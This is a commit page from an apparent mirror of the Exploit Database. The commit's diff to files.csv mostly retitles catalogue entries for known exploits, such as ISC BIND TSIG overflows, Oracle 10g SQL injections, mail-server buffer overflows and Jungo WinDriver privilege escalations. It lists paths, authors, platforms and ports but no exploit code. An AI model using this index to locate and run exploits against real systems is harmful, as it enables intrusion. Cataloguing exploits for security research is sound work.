bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2017-09-09

Browse source 
4 new exploits

Hexamail Server 3.0.0.001 - (pop3) Unauthenticated Remote Overflow (PoC)
Hexamail Server 3.0.0.001 - 'pop3' Unauthenticated Remote Overflow (PoC)

Noticeware E-mail Server 5.1.2.2 - (POP3) Unauthenticated Denial of Service
Noticeware E-mail Server 5.1.2.2 - 'POP3' Unauthenticated Denial of Service

BIND 8.2.2-P5 - Denial of Service
ISC BIND 8.2.2-P5 - Denial of Service

opera Web browser 7.54 java implementation - Multiple Vulnerabilities (2)
Opera Web browser 7.54 java implementation - Multiple Vulnerabilities (2)
Photoshop CC2014 and Bridge CC 2014 - '.gif' Parsing Memory Corruption
Photoshop CC2014 and Bridge CC 2014 - '.png' Parsing Memory Corruption
Photoshop CC2014 / Bridge CC 2014 - '.gif' Parsing Memory Corruption
Photoshop CC2014 / Bridge CC 2014 - '.png' Parsing Memory Corruption

/usr/bin/trn - Local Exploit (not suid)
/usr/bin/trn (Not SUID) - Local Exploit

Oracle 10g - SYS.LT.COMPRESSWORKSPACETREE SQL Injection (1)
Oracle 10g - 'SYS.LT.COMPRESSWORKSPACETREE' SQL Injection (1)

Oracle 10g - SYS.LT.COMPRESSWORKSPACETREE SQL Injection (2)
Oracle 10g - 'SYS.LT.COMPRESSWORKSPACETREE' SQL Injection (2)

opera Web browser 7.54 java implementation - Multiple Vulnerabilities (4)
Opera Web browser 7.54 java implementation - Multiple Vulnerabilities (4)
Jungo DriverWizard WinDriver - Kernel Pool Overflow
Jungo DriverWizard WinDriver - Kernel Out-of-Bounds Write Privilege Escalation
Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow Privilege Escalation
Jungo DriverWizard WinDriver < v12.4.0 - Kernel Out-of-Bounds Write Privilege Escalation

ProFTPd 1.2.9 rc2 - ASCII File Remote Code Execution (1)
ProFTPd 1.2.9 rc2 - '.ASCII' File Remote Code Execution (1)
BIND 8.2.x - 'TSIG' Stack Overflow (1)
BIND 8.2.x - 'TSIG' Stack Overflow (2)
BIND 8.2.x - 'TSIG' Stack Overflow (3)
BIND 8.2.x - 'TSIG' Stack Overflow (4)
ISC BIND 8.2.x - 'TSIG' Stack Overflow (1)
ISC BIND 8.2.x - 'TSIG' Stack Overflow (2)
ISC BIND 8.2.x - 'TSIG' Stack Overflow (3)
ISC BIND 8.2.x - 'TSIG' Stack Overflow (4)
Mercury/32 Mail Server 4.01 - (Pegasus) IMAP Buffer Overflow (1)
Mercury/32 Mail Server 4.01 - (Pegasus) IMAP Buffer Overflow (2)
Mercury/32 Mail Server 4.01 - 'Pegasus' IMAP Buffer Overflow (1)
Mercury/32 Mail Server 4.01 - 'Pegasus' IMAP Buffer Overflow (2)

Mercur MailServer 5.0 SP3 - (IMAP) Remote Buffer Overflow (1)
Mercur MailServer 5.0 SP3 - 'IMAP' Remote Buffer Overflow (1)

Mercur MailServer 5.0 SP3 - (IMAP) Remote Buffer Overflow (2)
Mercur MailServer 5.0 SP3 - 'IMAP' Remote Buffer Overflow (2)

QK SMTP 3.01 - (RCPT TO) Remote Buffer Overflow (1)
QK SMTP 3.01 - 'RCPT TO' Remote Buffer Overflow (1)

ProFTPd 1.2.9 rc2 - ASCII File Remote Code Execution (2)
ProFTPd 1.2.9 rc2 - '.ASCII' File Remote Code Execution (2)

QK SMTP 3.01 - (RCPT TO) Remote Buffer Overflow (2)
QK SMTP 3.01 - 'RCPT TO' Remote Buffer Overflow (2)

ProSysInfo TFTP server TFTPDWIN 0.4.2 - Remote Buffer Overflow (1)
ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow (1)
BIND 9.4.1 < 9.4.2 - Remote DNS Cache Poisoning Flaw Exploit (Metasploit)
BIND 9.x - Remote DNS Cache Poisoning Flaw Exploit (Python)
BIND 9.4.1 < 9.4.2 - Remote DNS Cache Poisoning Exploit (Metasploit)
BIND 9.x - Remote DNS Cache Poisoning Exploit (Python)

BIND 9.x - Remote DNS Cache Poisoning Flaw Exploit
BIND 9.x - Remote DNS Cache Poisoning Exploit

BIND 9.5.0-P2 - (randomized ports) Remote DNS Cache Poisoning Exploit
BIND 9.5.0-P2 - 'Randomized Ports' Remote DNS Cache Poisoning Exploit

Belkin Wireless G router + ADSL2 modem - Authentication Bypass
Belkin Wireless G Router / ADSL2 Modem - Authentication Bypass

Mozilla Firefox 3.5 - (Font tags) Remote Heap Spray (1)
Mozilla Firefox 3.5 - 'Font tags' Remote Heap Spray (1)

Mozilla Firefox 3.5 - (Font tags) Remote Heap Spray (2)
Mozilla Firefox 3.5 - 'Font tags' Remote Heap Spray (2)

Solaris in.TelnetD - 'TTYPROMPT' Buffer Overflow (Metasploit)
Solaris TelnetD - 'TTYPROMPT' Buffer Overflow (Metasploit)

Solaris in.TelnetD - TTYPROMPT Buffer Overflow (Metasploit)
Solaris TelnetD - 'TTYPROMPT' Buffer Overflow (Metasploit)
Multiple OSes - BIND Buffer Overflow (1)
Multiple OSes - BIND Buffer Overflow (2)
ISC BIND (Linux/BSD) - Buffer Overflow (1)
ISC BIND (Multiple OSes) - Buffer Overflow (2)
Oracle 10g Database - SUBSCRIPTION_NAME SQL Injection (1)
Oracle 10g Database - SUBSCRIPTION_NAME SQL Injection (2)
Oracle 10g Database - 'SUBSCRIPTION_NAME' SQL Injection (1)
Oracle 10g Database - 'SUBSCRIPTION_NAME' SQL Injection (2)

Shuttle Tech ADSL Modem-Router 915 WM - Unauthenticated Remote DNS Change
Shuttle Tech ADSL Modem/Router 915 WM - Unauthenticated Remote DNS Change

Poison Ivy 2.1.x - C2 Buffer Overflow (Metasploit)
Poison Ivy 2.1.x (C2 Server) - Buffer Overflow (Metasploit)

Gh0st Client - Buffer Overflow (Metasploit)
Gh0st Client (C2 Server) - Buffer Overflow (Metasploit)

zFeeder 1.6 - 'admin.php' Unauthenticated
zFeeder 1.6 - 'admin.php' Unauthenticated Admin Bypass

CompactCMS 1.4.0 - (tiny_mce) Arbitrary File Upload
CompactCMS 1.4.0 - 'tiny_mce' Arbitrary File Upload

Achievo 1.4.3 - Multiple Authorisation Flaws
Achievo 1.4.3 - Multiple Authorisation Vulnerabilities

CompactCMS 1.4.1 - Multiple Vulnerabilities

phpDenora 1.4.6 - Multiple SQL Injections

Joomla! Component 'com_niceajaxpoll' 1.3.0 - SQL Injection
Psunami Bulletin Board 0.x - Psunami.cgi Remote Command Execution (1)
Psunami Bulletin Board 0.x - Psunami.cgi Remote Command Execution (2)
Psunami Bulletin Board 0.x - 'Psunami.cgi' Remote Command Execution (1)
Psunami Bulletin Board 0.x - 'Psunami.cgi' Remote Command Execution (2)

CompactCMS 1.4.1 - Multiple Cross-Site Scripting Vulnerabilities (2)

PlaySms 1.4 - Remote Code Execution
PlaySMS 1.4 - 'sendfromfile.php' Remote Code Execution / Unrestricted File Upload

Ultimate HR System <= 1.2 - Directory Traversal / Cross-Site Scripting
Ultimate HR System < 1.2 - Directory Traversal / Cross-Site Scripting
EzBan 5.3 - 'id' Parameter SQL Injection
EzInvoice 6.02 - SQL Injection
Roteador Wireless Intelbras WRN150 - Cross-Site Scripting
Huawei HG255s - Directory Traversal
This commit is contained in:
Offensive Security 2017-09-09 05:01:22 +00:00
parent 67b3da92e4
commit 8ab6c39fe1
7 changed files with 181 additions and 52 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

108
files.csv
View file

@ -632,7 +632,7 @@ id,file,description,date,author,platform,type,port
4319,platforms/hardware/dos/4319.pl,"Thomson SpeedTouch ST 2030 (SIP Phone) - Remote Denial of Service",2007-08-27,MADYNES,hardware,dos,0
4335,platforms/windows/dos/4335.txt,"Yahoo! Messenger 8.1.0.413 - (webcam) Remote Crash",2007-08-29,wushi,windows,dos,0
4337,platforms/windows/dos/4337.c,"Microsoft Windows - 'gdi32.dll' Denial of Service (MS07-046)",2007-08-29,"Gil-Dong / Woo-Chi",windows,dos,0
4344,platforms/windows/dos/4344.php,"Hexamail Server 3.0.0.001 - (pop3) Unauthenticated Remote Overflow (PoC)",2007-08-30,rgod,windows,dos,0
4344,platforms/windows/dos/4344.php,"Hexamail Server 3.0.0.001 - 'pop3' Unauthenticated Remote Overflow (PoC)",2007-08-30,rgod,windows,dos,0
4347,platforms/linux/dos/4347.pl,"Wireshark < 0.99.5 - DNP3 Dissector Infinite Loop",2007-08-31,"Beyond Security",linux,dos,0
4359,platforms/multiple/dos/4359.txt,"Apple QuickTime < 7.2 - SMIL Remote Integer Overflow",2007-09-03,"David Vaartjes",multiple,dos,0
4369,platforms/windows/dos/4369.html,"Microsoft Visual FoxPro 6.0 - FPOLE.OCX 6.0.8450.0 Remote (PoC)",2007-09-06,shinnai,windows,dos,0
@ -825,7 +825,7 @@ id,file,description,date,author,platform,type,port
6716,platforms/windows/dos/6716.pl,"Microsoft Windows - GDI+ (PoC) (MS08-052) (2)",2008-10-09,"John Smith",windows,dos,0
6717,platforms/windows/dos/6717.py,"WinFTP Server 2.3.0 - (PASV mode) Remote Denial of Service",2008-10-09,dmnt,windows,dos,0
6718,platforms/linux/dos/6718.html,"Konqueror 3.5.9 - (load) Remote Crash",2008-10-10,"Jeremy Brown",linux,dos,0
6719,platforms/windows/dos/6719.py,"Noticeware E-mail Server 5.1.2.2 - (POP3) Unauthenticated Denial of Service",2008-10-10,rAWjAW,windows,dos,0
6719,platforms/windows/dos/6719.py,"Noticeware E-mail Server 5.1.2.2 - 'POP3' Unauthenticated Denial of Service",2008-10-10,rAWjAW,windows,dos,0
6726,platforms/hardware/dos/6726.txt,"Nokia Mini Map Browser - (array sort) Silent Crash",2008-10-10,ikki,hardware,dos,0
6732,platforms/windows/dos/6732.txt,"Microsoft Windows - InternalOpenColorProfile Heap Overflow (PoC) (MS08-046)",2008-10-12,Ac!dDrop,windows,dos,0
6738,platforms/windows/dos/6738.py,"GuildFTPd 0.999.8.11/0.999.14 - Heap Corruption (PoC) / Denial of Service",2008-10-12,dmnt,windows,dos,0
@ -2457,7 +2457,7 @@ id,file,description,date,author,platform,type,port
20373,platforms/hp-ux/dos/20373.txt,"HP-UX 9.x/10.x/11.x - cu Buffer Overflow",2000-11-02,zorgon,hp-ux,dos,0
20376,platforms/unix/dos/20376.txt,"Wietse Venema Rpcbind Replacement 2.1 - Denial of Service",1998-11-13,"Patrick Gilbert",unix,dos,0
20379,platforms/windows/dos/20379.txt,"Apple WebObjects Developer NT4 IIS4.0 CGI-adapter 4.5 - Developer Remote Overflow",2000-04-04,"Bruce Potter",windows,dos,0
20388,platforms/linux/dos/20388.txt,"BIND 8.2.2-P5 - Denial of Service",2000-11-01,"Fabio Pietrosanti",linux,dos,0
20388,platforms/linux/dos/20388.txt,"ISC BIND 8.2.2-P5 - Denial of Service",2000-11-01,"Fabio Pietrosanti",linux,dos,0
20400,platforms/cgi/dos/20400.txt,"McMurtrey/Whitaker & Associates Cart32 3.0/3.1/3.5 - Denial of Service",2000-11-10,sozni,cgi,dos,0
21041,platforms/multiple/dos/21041.txt,"Microsoft Internet Explorer 3/4/5 / Netscape Communicator 4 - IMG Tag Denial of Service",2001-06-19,"John Percival",multiple,dos,0
20403,platforms/windows/dos/20403.txt,"Small HTTP Server 2.0 1 - Non-Existent File Denial of Service",2000-11-14,"403-security team",windows,dos,0
@ -3264,7 +3264,7 @@ id,file,description,date,author,platform,type,port
24743,platforms/windows/dos/24743.txt,"Cam2pc 4.6.2 - BMP Image Processing Integer Overflow",2013-03-13,coolkaveh,windows,dos,0
24747,platforms/linux/dos/24747.c,"Linux Kernel - 'SCTP_GET_ASSOC_STATS()' Stack Based Buffer Overflow",2013-03-13,"Petr Matousek",linux,dos,0
24755,platforms/linux/dos/24755.java,"Opera Web browser 7.54 java implementation - Multiple Vulnerabilities (1)",2004-11-19,"Marc Schoenefeld",linux,dos,0
24756,platforms/linux/dos/24756.java,"opera Web browser 7.54 java implementation - Multiple Vulnerabilities (2)",2004-11-19,"Marc Schoenefeld",linux,dos,0
24756,platforms/linux/dos/24756.java,"Opera Web browser 7.54 java implementation - Multiple Vulnerabilities (2)",2004-11-19,"Marc Schoenefeld",linux,dos,0
24761,platforms/multiple/dos/24761.txt,"Gearbox Software Halo Game 1.x - Client Remote Denial of Service",2004-11-22,"Luigi Auriemma",multiple,dos,0
24763,platforms/multiple/dos/24763.txt,"Sun Java Runtime Environment 1.x Java Plugin - JavaScript Security Restriction Bypass",2004-11-22,"Jouko Pynnonen",multiple,dos,0
24854,platforms/php/dos/24854.txt,"PHP 3/4/5 - Local/Remote Multiple Vulnerabilities (1)",2004-12-15,"Stefan Esser",php,dos,0
@ -4570,8 +4570,8 @@ id,file,description,date,author,platform,type,port
37327,platforms/windows/dos/37327.py,"HansoPlayer 3.4.0 - Memory Corruption (PoC)",2015-06-19,"Rajganesh Pandurangan",windows,dos,0
37343,platforms/windows/dos/37343.py,"Seagate Dashboard 4.0.21.0 - Crash (PoC)",2015-06-23,HexTitan,windows,dos,0
37346,platforms/windows/dos/37346.txt,"Paintshop Pro X7 - '.gif' Conversion Heap Memory Corruption Vulnerabilities (LZWMinimumCodeSize)",2015-06-23,"Francis Provencher",windows,dos,0
37347,platforms/windows/dos/37347.txt,"Photoshop CC2014 and Bridge CC 2014 - '.gif' Parsing Memory Corruption",2015-06-23,"Francis Provencher",windows,dos,0
37348,platforms/windows/dos/37348.txt,"Photoshop CC2014 and Bridge CC 2014 - '.png' Parsing Memory Corruption",2015-06-23,"Francis Provencher",windows,dos,0
37347,platforms/windows/dos/37347.txt,"Photoshop CC2014 / Bridge CC 2014 - '.gif' Parsing Memory Corruption",2015-06-23,"Francis Provencher",windows,dos,0
37348,platforms/windows/dos/37348.txt,"Photoshop CC2014 / Bridge CC 2014 - '.png' Parsing Memory Corruption",2015-06-23,"Francis Provencher",windows,dos,0
37386,platforms/osx/dos/37386.php,"Apple Mac OSX 10.10.3 (Yosemite) Safari 8.0.x - Crash (PoC)",2015-06-26,"Mohammad Reza Espargham",osx,dos,0
37566,platforms/php/dos/37566.php,"PHP 5.4.3 - PDO Memory Access Violation Denial of Service",2012-08-02,0x721427D8,php,dos,0
37456,platforms/windows/dos/37456.html,"McAfee SiteAdvisor 3.7.2 - (firefox) Use-After-Free (PoC)",2015-07-01,"Marcin Ressel",windows,dos,0
@ -5833,7 +5833,7 @@ id,file,description,date,author,platform,type,port
763,platforms/linux/local/763.c,"fkey 0.0.2 - Local File Accessibility Exploit",2005-01-20,vade79,linux,local,79
766,platforms/osx/local/766.c,"Apple Mac OSX 10.3.7 - 'mRouter' Privilege Escalation",2005-01-22,nemo,osx,local,0
769,platforms/windows/local/769.c,"Funduc Search and Replace - Compressed File Local Buffer Overflow",2005-01-24,ATmaCA,windows,local,0
776,platforms/linux/local/776.c,"/usr/bin/trn - Local Exploit (not suid)",2005-01-26,ZzagorR,linux,local,0
776,platforms/linux/local/776.c,"/usr/bin/trn (Not SUID) - Local Exploit",2005-01-26,ZzagorR,linux,local,0
778,platforms/linux/local/778.c,"Linux Kernel 2.4 - 'uselib()' Privilege Escalation (2)",2005-01-27,"Tim Hsu",linux,local,0
779,platforms/linux/local/779.sh,"Linux ncpfs - Local Exploit",2005-01-30,super,linux,local,0
788,platforms/linux/local/788.pl,"Operator Shell (osh) 1.7-12 - Privilege Escalation",2005-02-05,"Charles Stevenson",linux,local,0
@ -6291,7 +6291,7 @@ id,file,description,date,author,platform,type,port
7671,platforms/windows/local/7671.pl,"VUPlayer 2.49 - '.wax' Local Buffer Overflow",2009-01-05,Houssamix,windows,local,0
7675,platforms/multiple/local/7675.txt,"Oracle 10g - SYS.LT.REMOVEWORKSPACE SQL Injection",2009-01-06,sh2kerr,multiple,local,0
7676,platforms/multiple/local/7676.txt,"Oracle 10g - SYS.LT.MERGEWORKSPACE SQL Injection",2009-01-06,sh2kerr,multiple,local,0
7677,platforms/multiple/local/7677.txt,"Oracle 10g - SYS.LT.COMPRESSWORKSPACETREE SQL Injection (1)",2009-01-06,sh2kerr,multiple,local,0
7677,platforms/multiple/local/7677.txt,"Oracle 10g - 'SYS.LT.COMPRESSWORKSPACETREE' SQL Injection (1)",2009-01-06,sh2kerr,multiple,local,0
7681,platforms/linux/local/7681.txt,"Debian XTERM - (DECRQSS/comments)",2009-01-06,"Paul Szabo",linux,local,0
7684,platforms/windows/local/7684.pl,"Rosoft Media Player 4.2.1 - Local Buffer Overflow",2009-01-06,Encrypt3d.M!nd,windows,local,0
7688,platforms/windows/local/7688.pl,"Cain & Abel 4.9.25 - 'Cisco IOS-MD5' Local Buffer Overflow",2009-01-07,send9,windows,local,0
@ -6443,7 +6443,7 @@ id,file,description,date,author,platform,type,port
9060,platforms/windows/local/9060.pl,"MP3-Nator 2.0 - '.plf' Universal Buffer Overflow (SEH)",2009-07-01,"ThE g0bL!N",windows,local,0
9064,platforms/windows/local/9064.pl,"AudioPLUS 2.00.215 - '.lst' / '.m3u' Local Buffer Overflow (SEH)",2009-07-01,hack4love,windows,local,0
9070,platforms/windows/local/9070.pl,"AudioPLUS 2.00.215 - '.pls' Local Buffer Overflow (SEH)",2009-07-01,Stack,windows,local,0
9072,platforms/multiple/local/9072.txt,"Oracle 10g - SYS.LT.COMPRESSWORKSPACETREE SQL Injection (2)",2009-07-02,"Sumit Siddharth",multiple,local,0
9072,platforms/multiple/local/9072.txt,"Oracle 10g - 'SYS.LT.COMPRESSWORKSPACETREE' SQL Injection (2)",2009-07-02,"Sumit Siddharth",multiple,local,0
9082,platforms/freebsd/local/9082.c,"FreeBSD 7.0/7.1 vfs.usermount - Privilege Escalation",2009-07-09,"Patroklos Argyroudis",freebsd,local,0
9083,platforms/lin_x86-64/local/9083.c,"Linux Kernel 2.6.24_16-23/2.6.27_7-10/2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86-64) - 'set_selection()' UTF-8 Off-by-One Privilege Escalation",2009-07-09,sgrakkyu,lin_x86-64,local,0
9097,platforms/multiple/local/9097.txt,"xscreensaver 5.01 - Arbitrary File Disclosure Symlink Exploit",2009-07-09,kingcope,multiple,local,0
@ -8232,7 +8232,7 @@ id,file,description,date,author,platform,type,port
24753,platforms/windows/local/24753.txt,"Mailtraq 2.x - Administration Console Privilege Escalation",2004-11-19,"Reed Arvin",windows,local,0
24754,platforms/windows/local/24754.txt,"Altiris Deployment Solution 5.6 - Client Service Privilege Escalation",2004-11-19,"Reed Arvin",windows,local,0
24757,platforms/linux/local/24757.java,"opera Web browser 7.54 java implementation - Multiple Vulnerabilities (3)",2004-11-19,"Marc Schoenefeld",linux,local,0
24758,platforms/linux/local/24758.java,"opera Web browser 7.54 java implementation - Multiple Vulnerabilities (4)",2004-11-19,"Marc Schoenefeld",linux,local,0
24758,platforms/linux/local/24758.java,"Opera Web browser 7.54 java implementation - Multiple Vulnerabilities (4)",2004-11-19,"Marc Schoenefeld",linux,local,0
24863,platforms/windows/local/24863.html,"EastFTP 4.6.02 - ActiveX Control",2013-03-20,Dr_IDE,windows,local,0
24872,platforms/windows/local/24872.txt,"Photodex ProShow Gold/Producer 5.0.3310/6.0.3410 - 'ScsiAccess.exe' Privilege Escalation",2013-03-22,"Julien Ahrens",windows,local,0
24884,platforms/windows/local/24884.html,"LiquidXML Studio 2012 - ActiveX Insecure Method Executable File Creation",2013-03-25,Dr_IDE,windows,local,0
@ -9228,8 +9228,8 @@ id,file,description,date,author,platform,type,port
42605,platforms/windows/local/42605.txt,"Lotus Notes Diagnostic Tool 8.5/9.0 - Privilege Escalation",2017-09-02,ParagonSec,windows,local,0
42611,platforms/linux/local/42611.txt,"RubyGems < 2.6.13 - Arbitrary File Overwrite",2017-09-04,mame,linux,local,0
42612,platforms/windows/local/42612.py,"Dup Scout Enterprise 9.9.14 - 'Input Directory' Local Buffer Overflow",2017-09-04,"Touhid M.Shaikh",windows,local,0
42624,platforms/windows/local/42624.py,"Jungo DriverWizard WinDriver - Kernel Pool Overflow",2017-09-06,mr_me,windows,local,0
42625,platforms/windows/local/42625.py,"Jungo DriverWizard WinDriver - Kernel Out-of-Bounds Write Privilege Escalation",2017-09-06,mr_me,windows,local,0
42624,platforms/windows/local/42624.py,"Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow Privilege Escalation",2017-09-06,mr_me,windows,local,0
42625,platforms/windows/local/42625.py,"Jungo DriverWizard WinDriver < v12.4.0 - Kernel Out-of-Bounds Write Privilege Escalation",2017-09-06,mr_me,windows,local,0
42626,platforms/linux/local/42626.c,"Tor (Linux) - X11 Linux Sandbox Breakout",2017-09-06,"Google Security Research",linux,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
@ -9297,7 +9297,7 @@ id,file,description,date,author,platform,type,port
102,platforms/linux/remote/102.c,"Knox Arkeia Pro 5.1.12 - Backup Remote Code Execution",2003-09-20,anonymous,linux,remote,617
103,platforms/windows/remote/103.c,"Microsoft Windows - 'RPC DCOM2' Remote Exploit (MS03-039)",2003-09-20,Flashsky,windows,remote,135
105,platforms/bsd/remote/105.pl,"GNU CFEngine 2.-2.0.3 - Remote Stack Overflow",2003-09-27,kokanin,bsd,remote,5308
107,platforms/linux/remote/107.c,"ProFTPd 1.2.9 rc2 - ASCII File Remote Code Execution (1)",2003-10-04,bkbll,linux,remote,21
107,platforms/linux/remote/107.c,"ProFTPd 1.2.9 rc2 - '.ASCII' File Remote Code Execution (1)",2003-10-04,bkbll,linux,remote,21
109,platforms/windows/remote/109.c,"Microsoft Windows - 'RPC2' Universal Exploit / Denial of Service (RPC3) (MS03-039)",2003-10-09,anonymous,windows,remote,135
110,platforms/linux/remote/110.c,"ProFTPd 1.2.7 < 1.2.9rc2 - Remote Code Execution / Brute Force",2003-10-13,Haggis,linux,remote,21
112,platforms/windows/remote/112.c,"mIRC 6.1 - 'IRC' Protocol Remote Buffer Overflow",2003-10-21,blasty,windows,remote,0
@ -9361,10 +9361,10 @@ id,file,description,date,author,platform,type,port
268,platforms/windows/remote/268.c,"Microsoft Windows Server 2000 SP1/SP2 - isapi .printer Extension Overflow (2)",2001-05-08,"dark spyrit",windows,remote,80
269,platforms/lin_x86/remote/269.c,"BeroFTPD 1.3.4(1) (Linux x86) - Remote Code Execution",2001-05-08,qitest1,lin_x86,remote,21
275,platforms/windows/remote/275.c,"Microsoft IIS 5.0 - SSL Remote Buffer Overflow (MS04-011)",2004-04-21,"Johnny Cyberpunk",windows,remote,443
277,platforms/linux/remote/277.c,"BIND 8.2.x - 'TSIG' Stack Overflow (1)",2001-03-01,Gneisenau,linux,remote,53
279,platforms/linux/remote/279.c,"BIND 8.2.x - 'TSIG' Stack Overflow (2)",2001-03-01,LSD-PLaNET,linux,remote,53
280,platforms/solaris/remote/280.c,"BIND 8.2.x - 'TSIG' Stack Overflow (3)",2001-03-01,LSD-PLaNET,solaris,remote,53
282,platforms/linux/remote/282.c,"BIND 8.2.x - 'TSIG' Stack Overflow (4)",2001-03-02,multiple,linux,remote,53
277,platforms/linux/remote/277.c,"ISC BIND 8.2.x - 'TSIG' Stack Overflow (1)",2001-03-01,Gneisenau,linux,remote,53
279,platforms/linux/remote/279.c,"ISC BIND 8.2.x - 'TSIG' Stack Overflow (2)",2001-03-01,LSD-PLaNET,linux,remote,53
280,platforms/solaris/remote/280.c,"ISC BIND 8.2.x - 'TSIG' Stack Overflow (3)",2001-03-01,LSD-PLaNET,solaris,remote,53
282,platforms/linux/remote/282.c,"ISC BIND 8.2.x - 'TSIG' Stack Overflow (4)",2001-03-02,multiple,linux,remote,53
284,platforms/linux/remote/284.c,"IMAP4rev1 12.261/12.264/2000.284 - (lsub) Remote Exploit",2001-03-03,SkyLaZarT,linux,remote,143
291,platforms/linux/remote/291.c,"TCP Connection Reset - Remote Exploit",2004-04-23,"Paul A. Watson",linux,remote,0
293,platforms/windows/remote/293.c,"Microsoft Windows - 'Lsasrv.dll' RPC Remote Buffer Overflow (MS04-011)",2004-04-24,sbaa,windows,remote,445
@ -9466,8 +9466,8 @@ id,file,description,date,author,platform,type,port
658,platforms/windows/remote/658.c,"MailEnable Mail Server IMAP 1.52 - Remote Buffer Overflow",2004-11-25,class101,windows,remote,143
660,platforms/linux/remote/660.c,"PHP 4.3.7/5.0.0RC3 - memory_limit Remote Exploit",2004-11-27,"Gyan Chawdhary",linux,remote,80
663,platforms/windows/remote/663.py,"Mercury/32 Mail Server 4.01 - 'Pegasus' IMAP Buffer Overflow (3)",2004-11-29,muts,windows,remote,143
668,platforms/windows/remote/668.c,"Mercury/32 Mail Server 4.01 - (Pegasus) IMAP Buffer Overflow (1)",2004-11-30,JohnH,windows,remote,143
670,platforms/windows/remote/670.c,"Mercury/32 Mail Server 4.01 - (Pegasus) IMAP Buffer Overflow (2)",2004-12-01,JohnH,windows,remote,143
668,platforms/windows/remote/668.c,"Mercury/32 Mail Server 4.01 - 'Pegasus' IMAP Buffer Overflow (1)",2004-11-30,JohnH,windows,remote,143
670,platforms/windows/remote/670.c,"Mercury/32 Mail Server 4.01 - 'Pegasus' IMAP Buffer Overflow (2)",2004-12-01,JohnH,windows,remote,143
675,platforms/windows/remote/675.txt,"Hosting Controller 0.6.1 Hotfix 1.4 - Directory Browsing",2004-12-05,Mouse,windows,remote,0
681,platforms/linux/remote/681.c,"Citadel/UX 6.27 - Format String",2004-12-12,CoKi,linux,remote,504
689,platforms/multiple/remote/689.pl,"wget 1.9 - Directory Traversal",2004-12-15,jjminar,multiple,remote,0
@ -9673,7 +9673,7 @@ id,file,description,date,author,platform,type,port
1578,platforms/linux/remote/1578.c,"PeerCast 0.1216 - (nextCGIarg) Remote Buffer Overflow (2)",2006-03-12,darkeagle,linux,remote,7144
1582,platforms/linux/remote/1582.c,"crossfire-server 1.9.0 - 'SetUp()' Remote Buffer Overflow",2006-03-13,landser,linux,remote,13327
1583,platforms/osx/remote/1583.pl,"Apple Mac OSX 10.4.5 Mail.app - (Real Name) Buffer Overflow",2006-03-13,"Kevin Finisterre",osx,remote,25
1592,platforms/windows/remote/1592.c,"Mercur MailServer 5.0 SP3 - (IMAP) Remote Buffer Overflow (1)",2006-03-19,pLL,windows,remote,0
1592,platforms/windows/remote/1592.c,"Mercur MailServer 5.0 SP3 - 'IMAP' Remote Buffer Overflow (1)",2006-03-19,pLL,windows,remote,0
1602,platforms/multiple/remote/1602.c,"BomberClone < 0.11.6.2 - (Error Messages) Remote Buffer Overflow",2006-03-22,"esca zoo",multiple,remote,11000
1606,platforms/windows/remote/1606.html,"Microsoft Internet Explorer - (createTextRang) Remote Code Execution",2006-03-23,darkeagle,windows,remote,0
1607,platforms/windows/remote/1607.cpp,"Microsoft Internet Explorer - 'createTextRang' Download Shellcode Exploit (1)",2006-03-23,ATmaCA,windows,remote,0
@ -9737,7 +9737,7 @@ id,file,description,date,author,platform,type,port
2283,platforms/windows/remote/2283.c,"TIBCO Rendezvous 7.4.11 - (add router) Remote Buffer Overflow",2006-09-01,"Andres Tarasco",windows,remote,0
2320,platforms/windows/remote/2320.txt,"IBM Director < 5.10 - 'Redirect.bat' Directory Traversal",2006-09-07,"Daniel Clemens",windows,remote,411
2328,platforms/windows/remote/2328.php,"RaidenHTTPD 1.1.49 - (SoftParserFileXml) Remote Code Execution",2006-09-08,rgod,windows,remote,80
2345,platforms/windows/remote/2345.pl,"Mercur MailServer 5.0 SP3 - (IMAP) Remote Buffer Overflow (2)",2006-09-11,"Jacopo Cervini",windows,remote,143
2345,platforms/windows/remote/2345.pl,"Mercur MailServer 5.0 SP3 - 'IMAP' Remote Buffer Overflow (2)",2006-09-11,"Jacopo Cervini",windows,remote,143
2355,platforms/windows/remote/2355.pm,"Microsoft Windows Server 2003 - NetpIsRemote() Remote Overflow (MS06-040) (Metasploit)",2006-09-13,"Trirat Puttaraksa",windows,remote,445
2358,platforms/windows/remote/2358.c,"Microsoft Internet Explorer - COM Object Remote Heap Overflow",2006-09-13,nop,windows,remote,0
2401,platforms/windows/remote/2401.c,"Ipswitch WS_FTP LE 5.08 - (PASV Response) Remote Buffer Overflow",2006-09-20,h07,windows,remote,0
@ -9756,7 +9756,7 @@ id,file,description,date,author,platform,type,port
2601,platforms/windows/remote/2601.c,"Ipswitch IMail Server 2006 / 8.x - (RCPT) Remote Stack Overflow",2006-10-19,"Greg Linares",windows,remote,25
2637,platforms/windows/remote/2637.c,"AEP SmartGate 4.3b - (GET) Arbitrary File Download Exploit",2006-10-24,prdelka,windows,remote,143
2638,platforms/hardware/remote/2638.c,"Cisco VPN 3000 Concentrator 4.1.7/4.7.2 - 'FTP' Remote Exploit",2006-10-24,prdelka,hardware,remote,0
2649,platforms/windows/remote/2649.c,"QK SMTP 3.01 - (RCPT TO) Remote Buffer Overflow (1)",2006-10-25,Expanders,windows,remote,25
2649,platforms/windows/remote/2649.c,"QK SMTP 3.01 - 'RCPT TO' Remote Buffer Overflow (1)",2006-10-25,Expanders,windows,remote,25
2651,platforms/windows/remote/2651.c,"MiniHTTPServer Web Forum & File Sharing Server 4.0 - Add User Exploit",2006-10-25,"Greg Linares",windows,remote,0
2657,platforms/windows/remote/2657.html,"Microsoft Internet Explorer 7 - Popup Address Bar Spoofing",2006-10-26,anonymous,windows,remote,0
2671,platforms/windows/remote/2671.pl,"Novell eDirectory 8.8 - NDS Server Remote Stack Overflow",2006-10-28,FistFuXXer,windows,remote,8028
@ -9788,14 +9788,14 @@ id,file,description,date,author,platform,type,port
